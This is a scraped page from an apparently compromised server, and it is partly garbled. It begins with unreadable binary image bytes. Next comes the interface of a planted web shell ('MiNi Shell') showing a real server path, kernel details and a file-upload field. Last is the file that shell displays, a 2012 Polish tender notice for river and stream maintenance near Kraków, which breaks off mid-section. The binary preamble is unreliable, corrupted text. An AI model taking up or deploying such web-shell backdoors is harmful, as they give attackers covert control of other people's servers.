JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120928/370038-N-2012.html

<p class="kh_header"><b>Kraków: Usługi na prace konserwacyjne zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie zgodnie z poszczególnymi częściami zamówienia..</b><br>
<b>Numer ogłoszenia: 370038 - 2012; data zamieszczenia: 28.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych Inspektorat Rejonowy w Krakowie , ul. Kraszewskiego 36, 30-110 Kraków, woj. małopolskie, tel. 12 628 09 80, faks 12 628 09 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi na prace konserwacyjne zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie zgodnie z poszczególnymi częściami zamówienia...</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część zamówienia Nr 28
zad.1.
Konserwacja nieuregulowanego potoku Dobranowicki 
w km 3+000-3+850, m.Rudno Dolne, gmina Nowe Brzesko, 
powiat proszowicki
Zakres prac obejmuje:
-Wykoszenie porostów, ręcznie ze skarp, porost gęsty, twardy z wygrabieniem 
-Ręczne ścinanie, krzaki i podszycia średniej gęstości ze skarp potoku 
-Oczyszczenie terenu z pozostałości po wycięciu krzaków, gałęzie, korzenie ze spaleniem na miejscu
-Roboty ziemne poprzeczne na przerzut z wbudowaniem ziemi w nasyp, kategoria gruntu III - usunięcie zatorów w dnie potoku z gałęzi, namułu, udrożnienie koryta
-Wykopy oraz przekopy wykonywane koparkami podsiębiernymi na odkład, koparka 0,25.m3, grunt kategorii III usunięcie zatorów w dnie potoku z namułu, pni i gałęzi -  praca koparki na podłożu mokrym 
-Wykop mechaniczny z ręcznym dokopem, plantowaniem skarp i rozplantowaniem urobku, kategoria gruntu III - profilowanie skarp i dna w miejscach usunięcia zatorów
zad.2.
Konserwacja  potoku Dobranowicki w km 6 + 700 ÷ 7 + 575 
w miejscowości Rudno Górne w gminie Igołomia - Wawrzeńczyce.
Zakres prac obejmuje:
Poz. 1. Ręczne ścinanie i karczowanie średniej gęstości  krzaków  i poszycia 
            ze skarp cieku;
Ręczny wyrąb drzew zagajnika, poszycia i krzaków z odrąbaniem gałęzi.
Odniesienie na odległość do 50m drągowiny, gałęzi i krzaków z ułożeniem 
w stosy.
Wykarczowanie pniaków z odniesieniem poza  granice roboty na odległość 50m i ułożenie w stosy.
Wygrabienie i spalenie na miejscu pozostałości po karczowaniu.

Poz. 2. Odtworzenie mechaniczne koryta potoku po istniejącej trasie;
Wykopy przy regulacji rzek i kanałów melioracyjnych wykonywane na odkład, koparką o poj. łyżki 0.25m3 i objętości wykopu pow. 1,0m3/mb, w gruncie  
kat. III.
Odspojenie gruntu koparką ze złożeniem urobku na odkład poza górną krawędź wykopu (w zasięgu ramienia koparki). 
Formowanie z grubsza dna i skarp wykopu.

Poz. 3. Rozplantowanie odkładów wydobytych z wykopu, grunt kat. II;
Rozplantowanie uprzednio wydobytej z wykopu ziemi warstwą grubości 20cm, 
w pasie terenu przyległego o szerokości około 10m, z nadaniem spadku plantowanej powierzchni w kierunku cieku.
Wyrównanie rozplantowanej powierzchni.
Wykonanie w rozplantowanej ziemi bruzd umożliwiających spływ wód.

Część zamówienia Nr 29
zad.1.
Konserwacja nieuregulowanego potoku Nadzówka w km 5+000 - 6+000 m.Kadzice, gmina Proszowice, powiat proszowicki 
Zakres prac obejmuje:
-Wykoszenie porostów, ręcznie ze skarp, porost gęsty, twardy z wygrabieniem 
-Ręczne ścinanie, krzaki średniej gęstości z wywiezieniem i zagospodarowaniem we własnym zakresie
-Roboty ziemne poprzeczne na przerzut z wbudowaniem ziemi w nasyp, kategoria gruntu III usunięcie zatorów w dnie potoku (tamy zbudowane przez bobry z namuł   i gałęzie) ręcznie w gruntach mokrych 
-Wykopy oraz przekopy wykonywane koparkami podsiębiernymi na odkład, koparka 0,25.m3, grunt kategorii III usunięcie zatorów w dnie potoku (tamy zbudowane przez bobry z namuł i gałęzie) mechanicznie, praca koparki na podłożu mokrym wymagającym użycia materacy drewnianych 
-Wykop mechaniczny z ręcznym dokopem, plantowaniem skarp i rozplantowaniem urobku, kategoria gruntu III - profilowanie skarp i dna w miejscach usunięcia tam
zad.2.
Konserwacja rzeki Szreniawy  w km 19+300 - 19+320, 26+500 - 26+600 nieuregulowana; m.Piekary, Stogniowice, gmina Proszowice, powiat proszowicki.
Zakres prac obejmuje:
-Usunięcie pni drzew z koryta rzeki o obwodzie 40 -100 cm z wywiezieniem         i zagospodarowaniem we własnym zakresie
-Usunięcie powalonych drzew (wiatrołomu) z koryta rzeki o obwodzie 40 -300 cm i długości ok.15m z pocięciem, wywiezieniem i zagospodarowaniem we własnym zakresie
-Ręczne ścinanie , krzaki i podszycia średniej gęstości wzdłuż rzeki                     z wywiezieniem i zagospodarowaniem we własnym zakresie
-Ręczne usunięcie zatorów w dnie rzeki (gałęzie, ziemia, śmieci) z wywiezieniem i zagospodarowaniem we własnym zakresie
-Wykopy oraz przekopy wykonywane koparkami podsiębiernymi na odkład, koparka 0,60.m3, grunt kategorii III - usunięcie zatorów w dnie rzeki, ścięcie nawisów ziemnych ze skarp rzeki, zasypanie wyrw w skarpach, udrożnienie dna rzeki z rozplantowaniem wzdłuż skarp rzeki, szerokość dna od 8,0-6,0m
-Wykonanie opasek palowo-kiszkowych, kiszki Fi.30+2x20.cm, wykonanie              z brzegu 
-Wykonanie narzutu kamiennego luzem, z brzegu, wyładunek ręczny, narzut nadwodny z kamienia ciężkiego lub średniego - zabudowa wyrwy w skarpie rzeki
-Budowa faszynady, wysokość budowli ponad 1,0.m - zabudowa wyrwy              w skarpie rzeki 

Część zamówienia Nr 30
zad.1.
Konserwacja nieuregulowanego potoku Racławka km 0+000 - 0+700 m.Kaczowice, gmina Radziemice, powiat proszowicki
Zakres prac obejmuje:
-Wykoszenie porostów, ręcznie ze skarp, porost gęsty, twardy z wygrabieniem 
-Ręczne wycięcie krzaków i odrostów wikliny ze skarp potoku z wywiezieniem       i zagospodarowaniem we własnym zakresie
-Oczyszczenie terenu wzdłuż potoku z pozostałości po wycięciu krzaków, gałęzie, z wywiezieniem i zagospodarowaniem we własnym zakresie
-Roboty ziemne poprzeczne na przerzut z wbudowaniem ziemi w skarpę, kategoria gruntu III - usunięcie zatorów w dnie potoku, udrożnienie koryta 
-Wykopy oraz przekopy wykonywane koparkami podsiębiernymi na odkład, koparka 0,15.m3, grunt kategorii III - usunięcie zatorów w dnie potoku, udrożnienie koryta
zad.2.
Konserwacja uregulowanego potoku Ścieklec km 13+800 - 13+840 m.Przemęczany, gmina Radziemice, powiat proszowicki
  Zakres prac obejmuje:
-Wykoszenie porostów, ręcznie ze skarp, porost gęsty, twardy z wygrabieniem 
-Usunięcie drzewa z koryta potoku o obwodzie 220, 40-75 cm i długości 10 -15m   z wykarczowaniem pni, z pocięciem, wywiezieniem i zagospodarowaniem we własnym zakresie
-Usunięcie powalonych drzew (wiatrołomu) z koryta rzeki o obwodzie 50-90 cm i długości ok.10m z wykarczowaniem pni, pocięciem, wywiezieniem i zagospodarowaniem we własnym zakresie
-Ręczne ścinanie , krzaki i podszycia średniej gęstości ze spaleniem na miejscu 
-Roboty ziemne poprzeczne na przerzut z wbudowaniem ziemi w nasyp, kategoria gruntu III - usunięcie zatorów w dnie, profilowanie skarp potoku, wykop pod ubezpieczenie 
-Wykopy oraz przekopy wykonywane koparkami podsiębiernymi na odkład, koparka 0,15.m3, grunt kategorii III - usunięcie zatorów w dnie potoku, udrożnienie koryta 
-Naprawa opasek z kiszek faszynowych z faszyny leśnej, Fi 20+20.cm, grunt kategorii III 
-Wykonanie narzutu kamiennego luzem, z brzegu, wyładunek ręczny, narzut nadwodny  z kamienia ciężkiego lub średniego 

Część zamówienia Nr 31
zad.1.
Konserwacja rzeki Dłubnia w km 1+300 - 1+310; 5+050 - 5+060; 5+150 - 5+180 nieuregulowana miasto Kraków, gm. Kraków, pow. Kraków
Zakres prac obejmuje:
-Usunięcie drzew rosnących w korycie rzeki z pocięciem,  wywiezieniem                                            i zagospodarowaniem we własnym zakresie,
-Przycinka korekcyjna drzew z wywiezieniem i zagospodarowaniem we własnym zakresie,
-Uporządkowanie terenu po zakończeniu prac,

Ze względu na specyficzną lokalizację - brak bezpośredniego dojazdu, bardzo strome skarpy, linie energetyczne, telefoniczne itp., ogrodzenia, budynki, kładkę, most, trakcje tramwajowe oraz inne trudność wykonania przedmiotowych prac NALEŻY DOKONAĆ OGLĘDZIN W TERENIE
zad.2.
Konserwacja rzeki Białucha w km 2+350 - 2+360 uregulowana, 
w km 5+555 - 5+560; 5+730 - 5+750 nieuregulowana miasto Kraków, gm.Kraków, pow.Kraków
Zakres prac obejmuje:
-Usunięcie powalonych drzew z koryta rzeki z pocięciem,  wywiezieniem                          i zagospodarowaniem we własnym zakresie,
-Usunięcie drzew rosnących w korycie rzeki z pocięciem,  wywiezieniem                                            i zagospodarowaniem we własnym zakresie,
-Ręczne usunięcie zatorów (gałęzie, konary) z jazu wraz z wywiezieniem                                            i zagospodarowaniem we własnym zakresie
-Uporządkowanie terenu po zakończeniu prac,

Część zamówienia Nr 32
Konserwacja koryta rzeki Rudawa - 2,00 km 
km 15+000-17+000, uregulowany-2,00km, m.Zabierzów, gm.Zabierzów Zakres prac obejmuje:
-Ręczne wykoszenie z wygrabieniem porostów gęstych, twardych ze skarp o szer. do 2m, 
-ręczne ścinanie  krzaków gęstych oraz zagajników średniej gęstości      z oczyszczeniem terenu jak i z wywozem,
-pocięcie drzew piłą mechaniczną (wiatrołomów), usunięci ich oraz przetamowań z koryta rzeki z transportem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 02.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli: 
a)1 wykażą ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy 
- w tym okresie ,że Wykonali co najmniej 2 prace w zakresie konserwacji
lub regulacji, rzek ,potoków o wartości co najmniej 20 000 zł. każda, (dotyczy części zamówienia Nr 28 ,Nr 29,Nr 30,Nr 32)odpowiadające swoim rodzajem pracom stanowiącym przedmiot zamówienia, z podaniem ich  wartości, przedmiotu, dat  wykonywania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te zostały wykonane należycie
a)2 wykażą ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy 
- w tym okresie ,że Wykonali co najmniej  2 prace w zakresie konserwacji lub regulacji, rzek ,potoków o wartości co najmniej 40 000 zł. każda, (dotyczy części zamówienia Nr 31) odpowiadające swoim rodzajem pracom stanowiącym przedmiot zamówienia, z podaniem ich  wartości, przedmiotu, dat  wykonywania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te zostały wykonane należycie 
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli wykażą ,że dysponują sprzętem i urządzeniami niezbędnymi 
do wykonania zamówienia a w szczególności; co najmniej 1 koparka, 1 samochód samowyładowczy lub 1 ciągnik z przyczepą (dot. części zamówienia Nr 28 , Nr 29,Nr 30,Nr 31) ,co najmniej 1 samochód samowyładowczy lub 1 ciągnik z przyczepą (dot. części zamówienia Nr 32) 
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli:wykażą ,że dysponują lub będą dysponować osobami posiadającymi kwalifikacje zawodowe konieczne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 (tj. Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.), a w szczególności 1 Osobę posiadającą uprawnienia o specjalności konstrukcyjno-budowlanej do kierowania pracami w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych ,która pełnić będzie obowiązki kierownika budowy, składając stosowne oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli: są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, przedłoży opłacone ubezpieczenie/z dowodem wpłaty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Formularz Oferty 2. Zaakceptowany projekt umowy 3. Dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 4. Stosowne pełnomocnictwo(a) potwierdzające, że dana osoba nie wymieniona w dokumencie rejestracyjnym prowadzonej działalności jest upoważniona do reprezentowania wykonawcy w postępowaniu. 5.Oświadczenie zgodnie z art. 44 o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1. 6.Oświadczenie , że nie podlega wykluczeniu na podstawie przesłanek zawartych w art 24 ust 1-2 7. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w sytuacji polegania przez Wykonawcę na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów 8. W przypadku osób fizycznych oświadczenie, że wyrażają zgodę na uczestnictwo w realizacji przedmiotu zamówienia po stronie Wykonawcy.9.Kosztorys ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
